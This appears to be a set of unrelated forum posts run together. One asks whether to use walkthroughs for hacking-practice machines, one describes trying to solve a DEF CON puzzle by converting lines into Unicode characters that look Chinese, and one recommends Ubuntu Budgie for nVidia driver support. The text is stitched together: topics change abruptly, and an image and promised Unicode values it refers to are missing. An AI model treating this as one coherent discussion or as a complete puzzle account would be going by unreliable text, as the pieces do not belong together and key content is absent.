Is it better to sort of bang your head for a long time, really only going to a hint or walkthrough when you're extremely desperate, or maybe even never - afterall, 'real' machines dont come with walkthroughs.

Or is it better to reach for a walkthrough or hint sooner and just remember the solution, or what you were doing wrong for next time, move on and add whatever the solution was to your "toolbelt". Sometimes I feel like I would never have got a box/solution without looking for some help.

I have been trying to do a defcon challenge for about 3 or 4 years. I received the following image.

After much thought and deliberation, I tried somethign relating to mroe than one of the other puzzles on this one. Application or usage of unicode conversions. So i converted each set of lines into a 16 bit unicode character and I ended up with some wierd lines and boxes going in all directions. After going to the gods of computers and scrying I have come to a hypothesis it's chinese (boththe simple and fancy stuff) .. I tried to convert some of these ideographs, but do not understand the meaning or application which can convert these into a 20 character code.

Since english only, i will give the unicode conversion equivalents.

nVidia is hell in linux. I use Ubuntu budgie that automatic install nvidia and it works for me full time.

it auto detect it during install and install it. if you have options in some menu like up riught. to put nvidia on demand. do it
